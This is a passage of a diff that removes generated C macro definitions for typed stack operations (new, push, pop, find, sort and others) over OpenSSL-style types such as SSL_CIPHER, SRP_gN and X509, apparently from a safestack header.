-#define sk_POLICY_MAPPING_value(st, i) SKM_sk_value(POLICY_MAPPING, (st), (i))
-#define sk_POLICY_MAPPING_set(st, i, val) SKM_sk_set(POLICY_MAPPING, (st), (i), (val))
-#define sk_POLICY_MAPPING_zero(st) SKM_sk_zero(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_push(st, val) SKM_sk_push(POLICY_MAPPING, (st), (val))
-#define sk_POLICY_MAPPING_unshift(st, val) SKM_sk_unshift(POLICY_MAPPING, (st), (val))
-#define sk_POLICY_MAPPING_find(st, val) SKM_sk_find(POLICY_MAPPING, (st), (val))
-#define sk_POLICY_MAPPING_find_ex(st, val) SKM_sk_find_ex(POLICY_MAPPING, (st), (val))
-#define sk_POLICY_MAPPING_delete(st, i) SKM_sk_delete(POLICY_MAPPING, (st), (i))
-#define sk_POLICY_MAPPING_delete_ptr(st, ptr) SKM_sk_delete_ptr(POLICY_MAPPING, (st), (ptr))
-#define sk_POLICY_MAPPING_insert(st, val, i) SKM_sk_insert(POLICY_MAPPING, (st), (val), (i))
-#define sk_POLICY_MAPPING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(POLICY_MAPPING, (st), (cmp))
-#define sk_POLICY_MAPPING_dup(st) SKM_sk_dup(POLICY_MAPPING, st)
-#define sk_POLICY_MAPPING_pop_free(st, free_func) SKM_sk_pop_free(POLICY_MAPPING, (st), (free_func))
-#define sk_POLICY_MAPPING_shift(st) SKM_sk_shift(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_pop(st) SKM_sk_pop(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_sort(st) SKM_sk_sort(POLICY_MAPPING, (st))
-#define sk_POLICY_MAPPING_is_sorted(st) SKM_sk_is_sorted(POLICY_MAPPING, (st))
-
-#define sk_SRP_gN_new(cmp) SKM_sk_new(SRP_gN, (cmp))
-#define sk_SRP_gN_new_null() SKM_sk_new_null(SRP_gN)
-#define sk_SRP_gN_free(st) SKM_sk_free(SRP_gN, (st))
-#define sk_SRP_gN_num(st) SKM_sk_num(SRP_gN, (st))
-#define sk_SRP_gN_value(st, i) SKM_sk_value(SRP_gN, (st), (i))
-#define sk_SRP_gN_set(st, i, val) SKM_sk_set(SRP_gN, (st), (i), (val))
-#define sk_SRP_gN_zero(st) SKM_sk_zero(SRP_gN, (st))
-#define sk_SRP_gN_push(st, val) SKM_sk_push(SRP_gN, (st), (val))
-#define sk_SRP_gN_unshift(st, val) SKM_sk_unshift(SRP_gN, (st), (val))
-#define sk_SRP_gN_find(st, val) SKM_sk_find(SRP_gN, (st), (val))
-#define sk_SRP_gN_find_ex(st, val) SKM_sk_find_ex(SRP_gN, (st), (val))
-#define sk_SRP_gN_delete(st, i) SKM_sk_delete(SRP_gN, (st), (i))
-#define sk_SRP_gN_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRP_gN, (st), (ptr))
-#define sk_SRP_gN_insert(st, val, i) SKM_sk_insert(SRP_gN, (st), (val), (i))
-#define sk_SRP_gN_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRP_gN, (st), (cmp))
-#define sk_SRP_gN_dup(st) SKM_sk_dup(SRP_gN, st)
-#define sk_SRP_gN_pop_free(st, free_func) SKM_sk_pop_free(SRP_gN, (st), (free_func))
-#define sk_SRP_gN_shift(st) SKM_sk_shift(SRP_gN, (st))
-#define sk_SRP_gN_pop(st) SKM_sk_pop(SRP_gN, (st))
-#define sk_SRP_gN_sort(st) SKM_sk_sort(SRP_gN, (st))
-#define sk_SRP_gN_is_sorted(st) SKM_sk_is_sorted(SRP_gN, (st))
-
-#define sk_SRP_gN_cache_new(cmp) SKM_sk_new(SRP_gN_cache, (cmp))
-#define sk_SRP_gN_cache_new_null() SKM_sk_new_null(SRP_gN_cache)
-#define sk_SRP_gN_cache_free(st) SKM_sk_free(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_num(st) SKM_sk_num(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_value(st, i) SKM_sk_value(SRP_gN_cache, (st), (i))
-#define sk_SRP_gN_cache_set(st, i, val) SKM_sk_set(SRP_gN_cache, (st), (i), (val))
-#define sk_SRP_gN_cache_zero(st) SKM_sk_zero(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_push(st, val) SKM_sk_push(SRP_gN_cache, (st), (val))
-#define sk_SRP_gN_cache_unshift(st, val) SKM_sk_unshift(SRP_gN_cache, (st), (val))
-#define sk_SRP_gN_cache_find(st, val) SKM_sk_find(SRP_gN_cache, (st), (val))
-#define sk_SRP_gN_cache_find_ex(st, val) SKM_sk_find_ex(SRP_gN_cache, (st), (val))
-#define sk_SRP_gN_cache_delete(st, i) SKM_sk_delete(SRP_gN_cache, (st), (i))
-#define sk_SRP_gN_cache_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRP_gN_cache, (st), (ptr))
-#define sk_SRP_gN_cache_insert(st, val, i) SKM_sk_insert(SRP_gN_cache, (st), (val), (i))
-#define sk_SRP_gN_cache_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRP_gN_cache, (st), (cmp))
-#define sk_SRP_gN_cache_dup(st) SKM_sk_dup(SRP_gN_cache, st)
-#define sk_SRP_gN_cache_pop_free(st, free_func) SKM_sk_pop_free(SRP_gN_cache, (st), (free_func))
-#define sk_SRP_gN_cache_shift(st) SKM_sk_shift(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_pop(st) SKM_sk_pop(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_sort(st) SKM_sk_sort(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_is_sorted(st) SKM_sk_is_sorted(SRP_gN_cache, (st))
-
-#define sk_SRP_user_pwd_new(cmp) SKM_sk_new(SRP_user_pwd, (cmp))
-#define sk_SRP_user_pwd_new_null() SKM_sk_new_null(SRP_user_pwd)
-#define sk_SRP_user_pwd_free(st) SKM_sk_free(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_num(st) SKM_sk_num(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_value(st, i) SKM_sk_value(SRP_user_pwd, (st), (i))
-#define sk_SRP_user_pwd_set(st, i, val) SKM_sk_set(SRP_user_pwd, (st), (i), (val))
-#define sk_SRP_user_pwd_zero(st) SKM_sk_zero(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_push(st, val) SKM_sk_push(SRP_user_pwd, (st), (val))
-#define sk_SRP_user_pwd_unshift(st, val) SKM_sk_unshift(SRP_user_pwd, (st), (val))
-#define sk_SRP_user_pwd_find(st, val) SKM_sk_find(SRP_user_pwd, (st), (val))
-#define sk_SRP_user_pwd_find_ex(st, val) SKM_sk_find_ex(SRP_user_pwd, (st), (val))
-#define sk_SRP_user_pwd_delete(st, i) SKM_sk_delete(SRP_user_pwd, (st), (i))
-#define sk_SRP_user_pwd_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRP_user_pwd, (st), (ptr))
-#define sk_SRP_user_pwd_insert(st, val, i) SKM_sk_insert(SRP_user_pwd, (st), (val), (i))
-#define sk_SRP_user_pwd_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRP_user_pwd, (st), (cmp))
-#define sk_SRP_user_pwd_dup(st) SKM_sk_dup(SRP_user_pwd, st)
-#define sk_SRP_user_pwd_pop_free(st, free_func) SKM_sk_pop_free(SRP_user_pwd, (st), (free_func))
-#define sk_SRP_user_pwd_shift(st) SKM_sk_shift(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_pop(st) SKM_sk_pop(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_sort(st) SKM_sk_sort(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_is_sorted(st) SKM_sk_is_sorted(SRP_user_pwd, (st))
-
-#define sk_SRTP_PROTECTION_PROFILE_new(cmp) SKM_sk_new(SRTP_PROTECTION_PROFILE, (cmp))
-#define sk_SRTP_PROTECTION_PROFILE_new_null() SKM_sk_new_null(SRTP_PROTECTION_PROFILE)
-#define sk_SRTP_PROTECTION_PROFILE_free(st) SKM_sk_free(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_num(st) SKM_sk_num(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_value(st, i) SKM_sk_value(SRTP_PROTECTION_PROFILE, (st), (i))
-#define sk_SRTP_PROTECTION_PROFILE_set(st, i, val) SKM_sk_set(SRTP_PROTECTION_PROFILE, (st), (i), (val))
-#define sk_SRTP_PROTECTION_PROFILE_zero(st) SKM_sk_zero(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_push(st, val) SKM_sk_push(SRTP_PROTECTION_PROFILE, (st), (val))
-#define sk_SRTP_PROTECTION_PROFILE_unshift(st, val) SKM_sk_unshift(SRTP_PROTECTION_PROFILE, (st), (val))
-#define sk_SRTP_PROTECTION_PROFILE_find(st, val) SKM_sk_find(SRTP_PROTECTION_PROFILE, (st), (val))
-#define sk_SRTP_PROTECTION_PROFILE_find_ex(st, val) SKM_sk_find_ex(SRTP_PROTECTION_PROFILE, (st), (val))
-#define sk_SRTP_PROTECTION_PROFILE_delete(st, i) SKM_sk_delete(SRTP_PROTECTION_PROFILE, (st), (i))
-#define sk_SRTP_PROTECTION_PROFILE_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRTP_PROTECTION_PROFILE, (st), (ptr))
-#define sk_SRTP_PROTECTION_PROFILE_insert(st, val, i) SKM_sk_insert(SRTP_PROTECTION_PROFILE, (st), (val), (i))
-#define sk_SRTP_PROTECTION_PROFILE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRTP_PROTECTION_PROFILE, (st), (cmp))
-#define sk_SRTP_PROTECTION_PROFILE_dup(st) SKM_sk_dup(SRTP_PROTECTION_PROFILE, st)
-#define sk_SRTP_PROTECTION_PROFILE_pop_free(st, free_func) SKM_sk_pop_free(SRTP_PROTECTION_PROFILE, (st), (free_func))
-#define sk_SRTP_PROTECTION_PROFILE_shift(st) SKM_sk_shift(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_pop(st) SKM_sk_pop(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_sort(st) SKM_sk_sort(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_is_sorted(st) SKM_sk_is_sorted(SRTP_PROTECTION_PROFILE, (st))
-
-#define sk_SSL_CIPHER_new(cmp) SKM_sk_new(SSL_CIPHER, (cmp))
-#define sk_SSL_CIPHER_new_null() SKM_sk_new_null(SSL_CIPHER)
-#define sk_SSL_CIPHER_free(st) SKM_sk_free(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_num(st) SKM_sk_num(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_value(st, i) SKM_sk_value(SSL_CIPHER, (st), (i))
-#define sk_SSL_CIPHER_set(st, i, val) SKM_sk_set(SSL_CIPHER, (st), (i), (val))
-#define sk_SSL_CIPHER_zero(st) SKM_sk_zero(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_push(st, val) SKM_sk_push(SSL_CIPHER, (st), (val))
-#define sk_SSL_CIPHER_unshift(st, val) SKM_sk_unshift(SSL_CIPHER, (st), (val))
-#define sk_SSL_CIPHER_find(st, val) SKM_sk_find(SSL_CIPHER, (st), (val))
-#define sk_SSL_CIPHER_find_ex(st, val) SKM_sk_find_ex(SSL_CIPHER, (st), (val))
-#define sk_SSL_CIPHER_delete(st, i) SKM_sk_delete(SSL_CIPHER, (st), (i))
-#define sk_SSL_CIPHER_delete_ptr(st, ptr) SKM_sk_delete_ptr(SSL_CIPHER, (st), (ptr))
-#define sk_SSL_CIPHER_insert(st, val, i) SKM_sk_insert(SSL_CIPHER, (st), (val), (i))
-#define sk_SSL_CIPHER_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SSL_CIPHER, (st), (cmp))
-#define sk_SSL_CIPHER_dup(st) SKM_sk_dup(SSL_CIPHER, st)
-#define sk_SSL_CIPHER_pop_free(st, free_func) SKM_sk_pop_free(SSL_CIPHER, (st), (free_func))
-#define sk_SSL_CIPHER_shift(st) SKM_sk_shift(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_pop(st) SKM_sk_pop(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_sort(st) SKM_sk_sort(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_is_sorted(st) SKM_sk_is_sorted(SSL_CIPHER, (st))
-
-#define sk_SSL_COMP_new(cmp) SKM_sk_new(SSL_COMP, (cmp))
-#define sk_SSL_COMP_new_null() SKM_sk_new_null(SSL_COMP)
-#define sk_SSL_COMP_free(st) SKM_sk_free(SSL_COMP, (st))
-#define sk_SSL_COMP_num(st) SKM_sk_num(SSL_COMP, (st))
-#define sk_SSL_COMP_value(st, i) SKM_sk_value(SSL_COMP, (st), (i))
-#define sk_SSL_COMP_set(st, i, val) SKM_sk_set(SSL_COMP, (st), (i), (val))
-#define sk_SSL_COMP_zero(st) SKM_sk_zero(SSL_COMP, (st))
-#define sk_SSL_COMP_push(st, val) SKM_sk_push(SSL_COMP, (st), (val))
-#define sk_SSL_COMP_unshift(st, val) SKM_sk_unshift(SSL_COMP, (st), (val))
-#define sk_SSL_COMP_find(st, val) SKM_sk_find(SSL_COMP, (st), (val))
-#define sk_SSL_COMP_find_ex(st, val) SKM_sk_find_ex(SSL_COMP, (st), (val))
-#define sk_SSL_COMP_delete(st, i) SKM_sk_delete(SSL_COMP, (st), (i))
-#define sk_SSL_COMP_delete_ptr(st, ptr) SKM_sk_delete_ptr(SSL_COMP, (st), (ptr))
-#define sk_SSL_COMP_insert(st, val, i) SKM_sk_insert(SSL_COMP, (st), (val), (i))
-#define sk_SSL_COMP_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SSL_COMP, (st), (cmp))
-#define sk_SSL_COMP_dup(st) SKM_sk_dup(SSL_COMP, st)
-#define sk_SSL_COMP_pop_free(st, free_func) SKM_sk_pop_free(SSL_COMP, (st), (free_func))
-#define sk_SSL_COMP_shift(st) SKM_sk_shift(SSL_COMP, (st))
-#define sk_SSL_COMP_pop(st) SKM_sk_pop(SSL_COMP, (st))
-#define sk_SSL_COMP_sort(st) SKM_sk_sort(SSL_COMP, (st))
-#define sk_SSL_COMP_is_sorted(st) SKM_sk_is_sorted(SSL_COMP, (st))
-
-#define sk_STACK_OF_X509_NAME_ENTRY_new(cmp) SKM_sk_new(STACK_OF_X509_NAME_ENTRY, (cmp))
-#define sk_STACK_OF_X509_NAME_ENTRY_new_null() SKM_sk_new_null(STACK_OF_X509_NAME_ENTRY)
-#define sk_STACK_OF_X509_NAME_ENTRY_free(st) SKM_sk_free(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_num(st) SKM_sk_num(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_value(st, i) SKM_sk_value(STACK_OF_X509_NAME_ENTRY, (st), (i))
-#define sk_STACK_OF_X509_NAME_ENTRY_set(st, i, val) SKM_sk_set(STACK_OF_X509_NAME_ENTRY, (st), (i), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_zero(st) SKM_sk_zero(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_push(st, val) SKM_sk_push(STACK_OF_X509_NAME_ENTRY, (st), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_unshift(st, val) SKM_sk_unshift(STACK_OF_X509_NAME_ENTRY, (st), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_find(st, val) SKM_sk_find(STACK_OF_X509_NAME_ENTRY, (st), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_find_ex(st, val) SKM_sk_find_ex(STACK_OF_X509_NAME_ENTRY, (st), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_delete(st, i) SKM_sk_delete(STACK_OF_X509_NAME_ENTRY, (st), (i))
-#define sk_STACK_OF_X509_NAME_ENTRY_delete_ptr(st, ptr) SKM_sk_delete_ptr(STACK_OF_X509_NAME_ENTRY, (st), (ptr))
-#define sk_STACK_OF_X509_NAME_ENTRY_insert(st, val, i) SKM_sk_insert(STACK_OF_X509_NAME_ENTRY, (st), (val), (i))
-#define sk_STACK_OF_X509_NAME_ENTRY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(STACK_OF_X509_NAME_ENTRY, (st), (cmp))
-#define sk_STACK_OF_X509_NAME_ENTRY_dup(st) SKM_sk_dup(STACK_OF_X509_NAME_ENTRY, st)
-#define sk_STACK_OF_X509_NAME_ENTRY_pop_free(st, free_func) SKM_sk_pop_free(STACK_OF_X509_NAME_ENTRY, (st), (free_func))
-#define sk_STACK_OF_X509_NAME_ENTRY_shift(st) SKM_sk_shift(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_pop(st) SKM_sk_pop(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_sort(st) SKM_sk_sort(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_is_sorted(st) SKM_sk_is_sorted(STACK_OF_X509_NAME_ENTRY, (st))
-
-#define sk_STORE_ATTR_INFO_new(cmp) SKM_sk_new(STORE_ATTR_INFO, (cmp))
-#define sk_STORE_ATTR_INFO_new_null() SKM_sk_new_null(STORE_ATTR_INFO)
-#define sk_STORE_ATTR_INFO_free(st) SKM_sk_free(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_num(st) SKM_sk_num(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_value(st, i) SKM_sk_value(STORE_ATTR_INFO, (st), (i))
-#define sk_STORE_ATTR_INFO_set(st, i, val) SKM_sk_set(STORE_ATTR_INFO, (st), (i), (val))
-#define sk_STORE_ATTR_INFO_zero(st) SKM_sk_zero(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_push(st, val) SKM_sk_push(STORE_ATTR_INFO, (st), (val))
-#define sk_STORE_ATTR_INFO_unshift(st, val) SKM_sk_unshift(STORE_ATTR_INFO, (st), (val))
-#define sk_STORE_ATTR_INFO_find(st, val) SKM_sk_find(STORE_ATTR_INFO, (st), (val))
-#define sk_STORE_ATTR_INFO_find_ex(st, val) SKM_sk_find_ex(STORE_ATTR_INFO, (st), (val))
-#define sk_STORE_ATTR_INFO_delete(st, i) SKM_sk_delete(STORE_ATTR_INFO, (st), (i))
-#define sk_STORE_ATTR_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(STORE_ATTR_INFO, (st), (ptr))
-#define sk_STORE_ATTR_INFO_insert(st, val, i) SKM_sk_insert(STORE_ATTR_INFO, (st), (val), (i))
-#define sk_STORE_ATTR_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(STORE_ATTR_INFO, (st), (cmp))
-#define sk_STORE_ATTR_INFO_dup(st) SKM_sk_dup(STORE_ATTR_INFO, st)
-#define sk_STORE_ATTR_INFO_pop_free(st, free_func) SKM_sk_pop_free(STORE_ATTR_INFO, (st), (free_func))
-#define sk_STORE_ATTR_INFO_shift(st) SKM_sk_shift(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_pop(st) SKM_sk_pop(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_sort(st) SKM_sk_sort(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_is_sorted(st) SKM_sk_is_sorted(STORE_ATTR_INFO, (st))
-
-#define sk_STORE_OBJECT_new(cmp) SKM_sk_new(STORE_OBJECT, (cmp))
-#define sk_STORE_OBJECT_new_null() SKM_sk_new_null(STORE_OBJECT)
-#define sk_STORE_OBJECT_free(st) SKM_sk_free(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_num(st) SKM_sk_num(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_value(st, i) SKM_sk_value(STORE_OBJECT, (st), (i))
-#define sk_STORE_OBJECT_set(st, i, val) SKM_sk_set(STORE_OBJECT, (st), (i), (val))
-#define sk_STORE_OBJECT_zero(st) SKM_sk_zero(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_push(st, val) SKM_sk_push(STORE_OBJECT, (st), (val))
-#define sk_STORE_OBJECT_unshift(st, val) SKM_sk_unshift(STORE_OBJECT, (st), (val))
-#define sk_STORE_OBJECT_find(st, val) SKM_sk_find(STORE_OBJECT, (st), (val))
-#define sk_STORE_OBJECT_find_ex(st, val) SKM_sk_find_ex(STORE_OBJECT, (st), (val))
-#define sk_STORE_OBJECT_delete(st, i) SKM_sk_delete(STORE_OBJECT, (st), (i))
-#define sk_STORE_OBJECT_delete_ptr(st, ptr) SKM_sk_delete_ptr(STORE_OBJECT, (st), (ptr))
-#define sk_STORE_OBJECT_insert(st, val, i) SKM_sk_insert(STORE_OBJECT, (st), (val), (i))
-#define sk_STORE_OBJECT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(STORE_OBJECT, (st), (cmp))
-#define sk_STORE_OBJECT_dup(st) SKM_sk_dup(STORE_OBJECT, st)
-#define sk_STORE_OBJECT_pop_free(st, free_func) SKM_sk_pop_free(STORE_OBJECT, (st), (free_func))
-#define sk_STORE_OBJECT_shift(st) SKM_sk_shift(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_pop(st) SKM_sk_pop(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_sort(st) SKM_sk_sort(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_is_sorted(st) SKM_sk_is_sorted(STORE_OBJECT, (st))
-
-#define sk_SXNETID_new(cmp) SKM_sk_new(SXNETID, (cmp))
-#define sk_SXNETID_new_null() SKM_sk_new_null(SXNETID)
-#define sk_SXNETID_free(st) SKM_sk_free(SXNETID, (st))
-#define sk_SXNETID_num(st) SKM_sk_num(SXNETID, (st))
-#define sk_SXNETID_value(st, i) SKM_sk_value(SXNETID, (st), (i))
-#define sk_SXNETID_set(st, i, val) SKM_sk_set(SXNETID, (st), (i), (val))
-#define sk_SXNETID_zero(st) SKM_sk_zero(SXNETID, (st))
-#define sk_SXNETID_push(st, val) SKM_sk_push(SXNETID, (st), (val))
-#define sk_SXNETID_unshift(st, val) SKM_sk_unshift(SXNETID, (st), (val))
-#define sk_SXNETID_find(st, val) SKM_sk_find(SXNETID, (st), (val))
-#define sk_SXNETID_find_ex(st, val) SKM_sk_find_ex(SXNETID, (st), (val))
-#define sk_SXNETID_delete(st, i) SKM_sk_delete(SXNETID, (st), (i))
-#define sk_SXNETID_delete_ptr(st, ptr) SKM_sk_delete_ptr(SXNETID, (st), (ptr))
-#define sk_SXNETID_insert(st, val, i) SKM_sk_insert(SXNETID, (st), (val), (i))
-#define sk_SXNETID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SXNETID, (st), (cmp))
-#define sk_SXNETID_dup(st) SKM_sk_dup(SXNETID, st)
-#define sk_SXNETID_pop_free(st, free_func) SKM_sk_pop_free(SXNETID, (st), (free_func))
-#define sk_SXNETID_shift(st) SKM_sk_shift(SXNETID, (st))
-#define sk_SXNETID_pop(st) SKM_sk_pop(SXNETID, (st))
-#define sk_SXNETID_sort(st) SKM_sk_sort(SXNETID, (st))
-#define sk_SXNETID_is_sorted(st) SKM_sk_is_sorted(SXNETID, (st))
-
-#define sk_UI_STRING_new(cmp) SKM_sk_new(UI_STRING, (cmp))
-#define sk_UI_STRING_new_null() SKM_sk_new_null(UI_STRING)
-#define sk_UI_STRING_free(st) SKM_sk_free(UI_STRING, (st))
-#define sk_UI_STRING_num(st) SKM_sk_num(UI_STRING, (st))
-#define sk_UI_STRING_value(st, i) SKM_sk_value(UI_STRING, (st), (i))
-#define sk_UI_STRING_set(st, i, val) SKM_sk_set(UI_STRING, (st), (i), (val))
-#define sk_UI_STRING_zero(st) SKM_sk_zero(UI_STRING, (st))
-#define sk_UI_STRING_push(st, val) SKM_sk_push(UI_STRING, (st), (val))
-#define sk_UI_STRING_unshift(st, val) SKM_sk_unshift(UI_STRING, (st), (val))
-#define sk_UI_STRING_find(st, val) SKM_sk_find(UI_STRING, (st), (val))
-#define sk_UI_STRING_find_ex(st, val) SKM_sk_find_ex(UI_STRING, (st), (val))
-#define sk_UI_STRING_delete(st, i) SKM_sk_delete(UI_STRING, (st), (i))
-#define sk_UI_STRING_delete_ptr(st, ptr) SKM_sk_delete_ptr(UI_STRING, (st), (ptr))
-#define sk_UI_STRING_insert(st, val, i) SKM_sk_insert(UI_STRING, (st), (val), (i))
-#define sk_UI_STRING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(UI_STRING, (st), (cmp))
-#define sk_UI_STRING_dup(st) SKM_sk_dup(UI_STRING, st)
-#define sk_UI_STRING_pop_free(st, free_func) SKM_sk_pop_free(UI_STRING, (st), (free_func))
-#define sk_UI_STRING_shift(st) SKM_sk_shift(UI_STRING, (st))
-#define sk_UI_STRING_pop(st) SKM_sk_pop(UI_STRING, (st))
-#define sk_UI_STRING_sort(st) SKM_sk_sort(UI_STRING, (st))
-#define sk_UI_STRING_is_sorted(st) SKM_sk_is_sorted(UI_STRING, (st))
-
-#define sk_X509_new(cmp) SKM_sk_new(X509, (cmp))
-#define sk_X509_new_null() SKM_sk_new_null(X509)
-#define sk_X509_free(st) SKM_sk_free(X509, (st))
-#define sk_X509_num(st) SKM_sk_num(X509, (st))
-#define sk_X509_value(st, i) SKM_sk_value(X509, (st), (i))
-#define sk_X509_set(st, i, val) SKM_sk_set(X509, (st), (i), (val))
-#define sk_X509_zero(st) SKM_sk_zero(X509, (st))
-#define sk_X509_push(st, val) SKM_sk_push(X509, (st), (val))
-#define sk_X509_unshift(st, val) SKM_sk_unshift(X509, (st), (val))
-#define sk_X509_find(st, val) SKM_sk_find(X509, (st), (val))
-#define sk_X509_find_ex(st, val) SKM_sk_find_ex(X509, (st), (val))
-#define sk_X509_delete(st, i) SKM_sk_delete(X509, (st), (i))
-#define sk_X509_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509, (st), (ptr))
-#define sk_X509_insert(st, val, i) SKM_sk_insert(X509, (st), (val), (i))
-#define sk_X509_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509, (st), (cmp))
-#define sk_X509_dup(st) SKM_sk_dup(X509, st)
-#define sk_X509_pop_free(st, free_func) SKM_sk_pop_free(X509, (st), (free_func))
-#define sk_X509_shift(st) SKM_sk_shift(X509, (st))
-#define sk_X509_pop(st) SKM_sk_pop(X509, (st))
-#define sk_X509_sort(st) SKM_sk_sort(X509, (st))
-#define sk_X509_is_sorted(st) SKM_sk_is_sorted(X509, (st))
-
-#define sk_X509V3_EXT_METHOD_new(cmp) SKM_sk_new(X509V3_EXT_METHOD, (cmp))
-#define sk_X509V3_EXT_METHOD_new_null() SKM_sk_new_null(X509V3_EXT_METHOD)
-#define sk_X509V3_EXT_METHOD_free(st) SKM_sk_free(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_num(st) SKM_sk_num(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_value(st, i) SKM_sk_value(X509V3_EXT_METHOD, (st), (i))
-#define sk_X509V3_EXT_METHOD_set(st, i, val) SKM_sk_set(X509V3_EXT_METHOD, (st), (i), (val))
-#define sk_X509V3_EXT_METHOD_zero(st) SKM_sk_zero(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_push(st, val) SKM_sk_push(X509V3_EXT_METHOD, (st), (val))
-#define sk_X509V3_EXT_METHOD_unshift(st, val) SKM_sk_unshift(X509V3_EXT_METHOD, (st), (val))
-#define sk_X509V3_EXT_METHOD_find(st, val) SKM_sk_find(X509V3_EXT_METHOD, (st), (val))
-#define sk_X509V3_EXT_METHOD_find_ex(st, val) SKM_sk_find_ex(X509V3_EXT_METHOD, (st), (val))
-#define sk_X509V3_EXT_METHOD_delete(st, i) SKM_sk_delete(X509V3_EXT_METHOD, (st), (i))
-#define sk_X509V3_EXT_METHOD_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509V3_EXT_METHOD, (st), (ptr))
-#define sk_X509V3_EXT_METHOD_insert(st, val, i) SKM_sk_insert(X509V3_EXT_METHOD, (st), (val), (i))
-#define sk_X509V3_EXT_METHOD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509V3_EXT_METHOD, (st), (cmp))
-#define sk_X509V3_EXT_METHOD_dup(st) SKM_sk_dup(X509V3_EXT_METHOD, st)
-#define sk_X509V3_EXT_METHOD_pop_free(st, free_func) SKM_sk_pop_free(X509V3_EXT_METHOD, (st), (free_func))
-#define sk_X509V3_EXT_METHOD_shift(st) SKM_sk_shift(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_pop(st) SKM_sk_pop(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_sort(st) SKM_sk_sort(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_is_sorted(st) SKM_sk_is_sorted(X509V3_EXT_METHOD, (st))
-
-#define sk_X509_ALGOR_new(cmp) SKM_sk_new(X509_ALGOR, (cmp))
-#define sk_X509_ALGOR_new_null() SKM_sk_new_null(X509_ALGOR)
-#define sk_X509_ALGOR_free(st) SKM_sk_free(X509_ALGOR, (st))
-#define sk_X509_ALGOR_num(st) SKM_sk_num(X509_ALGOR, (st))
-#define sk_X509_ALGOR_value(st, i) SKM_sk_value(X509_ALGOR, (st), (i))
-#define sk_X509_ALGOR_set(st, i, val) SKM_sk_set(X509_ALGOR, (st), (i), (val))
